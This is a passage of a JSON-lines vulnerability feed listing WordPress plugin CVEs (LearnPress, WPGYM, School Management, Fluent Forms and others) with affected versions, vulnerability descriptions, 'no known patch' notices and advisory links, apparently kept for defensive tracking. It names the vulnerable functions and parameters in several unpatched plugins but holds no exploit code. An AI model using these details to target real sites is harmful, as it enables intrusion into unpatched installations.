ource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12383","slug":"woo-binary-mlm","versionImpact":"2.0","description":"The Binary MLM Woocommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0. This is due to missing or incorrect nonce validation on the 'bmw_display_pv_set_page' function and insufficient input sanitization and output escaping of the 'product_points' parameter. This makes it possible for unauthenticated attackers to inject arbitrary web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/point_setting.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/point_setting.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/point_setting.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/point_setting.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/point_setting.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/point_setting.php#L96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b061fbf2-4bb3-4ccc-ba90-1e947365435e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b061fbf2-4bb3-4ccc-ba90-1e947365435e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13599","slug":"learnpress","versionImpact":"4.2.7.5","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.2.7.5 due to insufficient input sanitization and output escaping of a lesson name. This makes it possible for authenticated attackers, with LP Instructor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226650\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226650\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/learnpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/learnpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67709117-8912-4c09-afcb-0c07345d00e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67709117-8912-4c09-afcb-0c07345d00e0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13010","slug":"wp-foodbakery","versionImpact":"4.8","description":"The WP Foodbakery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 4.7 due to insufficient input sanitization and output escaping on the 'search_type' parameter. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f267527d-5fb5-4fc2-bb35-bc60854f1a68?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f267527d-5fb5-4fc2-bb35-bc60854f1a68?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2107","slug":"arielbrailovsky-viralad","versionImpact":"1.0.8","description":"The ArielBrailovsky-ViralAd plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter of the printResultAndDie() function in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This only appears to be exploitable on very old versions of WordPress.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arielbrailovsky-viralad\\\/trunk\\\/inc\\\/anuncio.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arielbrailovsky-viralad\\\/trunk\\\/inc\\\/anuncio.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/arielbrailovsky-viralad\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/arielbrailovsky-viralad\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6c846c8-df8a-4a95-834e-a9443b6a86b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6c846c8-df8a-4a95-834e-a9443b6a86b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2880","slug":"yame-linkinbio","versionImpact":"0.9.0","description":"The Yame | Link In Bio plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 0.9.0 through the publicly accessible phpinfo.php script. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/yame-linkinbio\\\/trunk\\\/vendor\\\/phpfastcache\\\/phpfastcache\\\/examples\\\/phpinfo.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/yame-linkinbio\\\/trunk\\\/vendor\\\/phpfastcache\\\/phpfastcache\\\/examples\\\/phpinfo.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yame-linkinbio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yame-linkinbio\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c45aea72-2c9d-484d-8904-a1985df4b57c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c45aea72-2c9d-484d-8904-a1985df4b57c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11266","slug":"geocache-stat-bar-widget","versionImpact":"0.911","description":"The Geocache Stat Bar Widget WordPress plugin through 0.911 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/361a4635-7e7d-483c-b2ce-a857d60d91ea\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/361a4635-7e7d-483c-b2ce-a857d60d91ea\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24759","slug":"wp-businessdirectory","versionImpact":"3.1.3","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory allows Blind SQL Injection. This issue affects WP-BusinessDirectory: from n\/a through 3.1.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-businessdirectory\\\/vulnerability\\\/wordpress-wp-businessdirectory-3-1-3-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-businessdirectory\\\/vulnerability\\\/wordpress-wp-businessdirectory-3-1-3-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6080","slug":"gym-management","versionImpact":"67.7.0","description":"The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to unauthorized admin account creation in all versions up to, and including, 67.7.0. This is due to the plugin not properly validating a user's capabilities prior to adding users. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new users, including admins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f853657-1801-4d63-89b8-b2132212a205?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f853657-1801-4d63-89b8-b2132212a205?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0388","slug":"randomtext","versionImpact":"0.3.0","description":"The Random Text WordPress plugin through 0.3.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscribers.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/77861a2e-879a-4bd0-b4c0-cd19481ace5d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/77861a2e-879a-4bd0-b4c0-cd19481ace5d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3404","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.5.0","description":"The ProfileGrid plugin for WordPress is vulnerable to unauthorized decryption of private information in versions up to, and including, 5.5.0. This is due to the passphrase and iv being hardcoded in the 'pm_encrypt_decrypt_pass' function and used across all sites running the plugin. This makes it possible for authenticated attackers, with administrator-level permissions or above to decrypt and view users' passwords. If combined with another vulnerability, this can potentially grant lower-privileged users access to users' passwords.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d490bfb-6560-428e-ad91-0f8d8bc9b1f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d490bfb-6560-428e-ad91-0f8d8bc9b1f2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/includes\\\/class-profile-magic-request.php#L325\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/includes\\\/class-profile-magic-request.php#L325\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2936383\\\/profilegrid-user-profiles-groups-and-communities#file475\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2936383\\\/profilegrid-user-profiles-groups-and-communities#file475\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7247","slug":"login-as-customer-or-user","versionImpact":"3.8","description":"The Login as User or Customer WordPress plugin through 3.8 does not prevent users to log in as any other user on the site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/96b93253-31d0-4184-94b7-f1e18355d841\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/96b93253-31d0-4184-94b7-f1e18355d841\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1GCOzJ-ZovYij9GIdmsrZrR9g8mlC22hs\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1GCOzJ-ZovYij9GIdmsrZrR9g8mlC22hs\\\/view?usp=sharing\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3595","slug":"pure-chat","versionImpact":"2.22","description":"The Pure Chat \u2013 Live Chat Plugin & More! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the purechatwid and purechatwname parameter in all versions up to, and including, 2.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d03c798-dc77-407c-8674-d0bd2f1ada8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d03c798-dc77-407c-8674-d0bd2f1ada8c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pure-chat\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pure-chat\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4668","slug":"gum-elementor-addon","versionImpact":"1.3.4","description":"The Gum Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Price Table and Post Slider widgets in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b4effc8-7b24-4a6c-a161-176a22de6d6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b4effc8-7b24-4a6c-a161-176a22de6d6a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gum-elementor-addon\\\/trunk\\\/widgets\\\/pricetable.php#L2013\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gum-elementor-addon\\\/trunk\\\/widgets\\\/pricetable.php#L2013\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gum-elementor-addon\\\/trunk\\\/widgets\\\/post_slider.php#L2353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gum-elementor-addon\\\/trunk\\\/widgets\\\/post_slider.php#L2353\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gum-elementor-addon\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gum-elementor-addon\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093511\\\/#file48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093511\\\/#file48\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6069","slug":"pie-register","versionImpact":"3.8.3.4","description":"The Registration Forms \u2013 User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation\/deactivation due to missing capability checks on the pieregister_install_addon, pieregister_activate_addon and pieregister_deactivate_addon functions in all versions up to, and including, 3.8.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install, activate and deactivate arbitrary plugins. As a result attackers might achieve code execution on the targeted server","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b946ee73-4cf9-48c8-b456-285b118c6b05?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b946ee73-4cf9-48c8-b456-285b118c6b05?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.4\\\/pie-register.php#L794\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.4\\\/pie-register.php#L794\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.4\\\/pie-register.php#L727\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.4\\\/pie-register.php#L727\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.4\\\/pie-register.php#L761\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.4\\\/pie-register.php#L761\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6521","slug":"fluentform","versionImpact":"5.1.19","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be7c6cfa-6cac-46d2-8eb9-9fef8049f6e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be7c6cfa-6cac-46d2-8eb9-9fef8049f6e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43268","slug":"wp-backitup","versionImpact":"1.50","description":"Access Control vulnerability in WPBackItUp Backup and Restore WordPress allows .\n\nThis issue affects Backup and Restore WordPress: from n\/a through 1.50.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-backitup\\\/wordpress-backup-and-restore-wordpress-plugin-1-50-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-backitup\\\/wordpress-backup-and-restore-wordpress-plugin-1-50-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11428","slug":"lazy-load-videos-and-sticky-control","versionImpact":"3.0.0","description":"The Lazy load videos and sticky control plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lazy-load-videos-and-sticky-control' shortcode in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lazy-load-videos-and-sticky-control\\\/trunk\\\/inc\\\/classes\\\/class-lazy-load-videos-and-sticky-control-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lazy-load-videos-and-sticky-control\\\/trunk\\\/inc\\\/classes\\\/class-lazy-load-videos-and-sticky-control-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lazy-load-videos-and-sticky-control\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lazy-load-videos-and-sticky-control\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a9715c3-6ce0-46f8-820d-194bd0e8e6fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a9715c3-6ce0-46f8-820d-194bd0e8e6fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12261","slug":"smartemailing","versionImpact":"2.2.0","description":"The SmartEmailing.cz plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'se-lists-updated' parameter in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smartemailing\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smartemailing\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7332c21a-3501-4066-b7b7-34914a228d8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7332c21a-3501-4066-b7b7-34914a228d8f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13586","slug":"masy-gallery","versionImpact":"1.7","description":"The Masy Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'justified-gallery' shortcode in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/masy-gallery\\\/trunk\\\/inc\\\/masygal-justified-shortcode.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/masy-gallery\\\/trunk\\\/inc\\\/masygal-justified-shortcode.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b865df96-335c-4856-a5e5-e728fb0645d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b865df96-335c-4856-a5e5-e728fb0645d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2106","slug":"arielbrailovsky-viralad","versionImpact":"1.0.8","description":"The ArielBrailovsky-ViralAd plugin for WordPress is vulnerable to SQL Injection via the 'text' and 'id' parameters of the limpia() function in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This only appears to be exploitable on very old versions of WordPress.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arielbrailovsky-viralad\\\/trunk\\\/inc\\\/anuncio.php#L174\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arielbrailovsky-viralad\\\/trunk\\\/inc\\\/anuncio.php#L174\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/arielbrailovsky-viralad\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/arielbrailovsky-viralad\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60cd2178-858e-4e24-8967-13b04f675d2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60cd2178-858e-4e24-8967-13b04f675d2d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11221","slug":"full-screen-page-background-image-slideshow","versionImpact":"1.1","description":"The Full Screen (Page) Background Image Slideshow WordPress plugin through 1.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/810c2c94-5d35-419c-a993-07a0c7064ce6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/810c2c94-5d35-419c-a993-07a0c7064ce6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6079","slug":"school-management","versionImpact":"93.2.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the homework.php file in all versions up to, and including, 93.2.0. This makes it possible for authenticated attackers, with Student-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d872ec33-6284-495c-b894-41fe7b40b63c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d872ec33-6284-495c-b894-41fe7b40b63c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4550","slug":"user-activity","versionImpact":"1.0.1","description":"The User Activity WordPress plugin through 1.0.1 checks headers such as the X-Forwarded-For to retrieve the IP address of the request, which could lead to IP spoofing","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1179959-2044-479f-a5ca-3c9ffc46d00e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1179959-2044-479f-a5ca-3c9ffc46d00e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3162","slug":"payment-gateway-stripe-and-woocommerce-integration","versionImpact":"3.7.7","description":"The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.7.7. This is due to insufficient verification on the user being supplied during a Stripe checkout through the plugin. This allows unauthenticated attackers to log in as users who have orders, who are typically 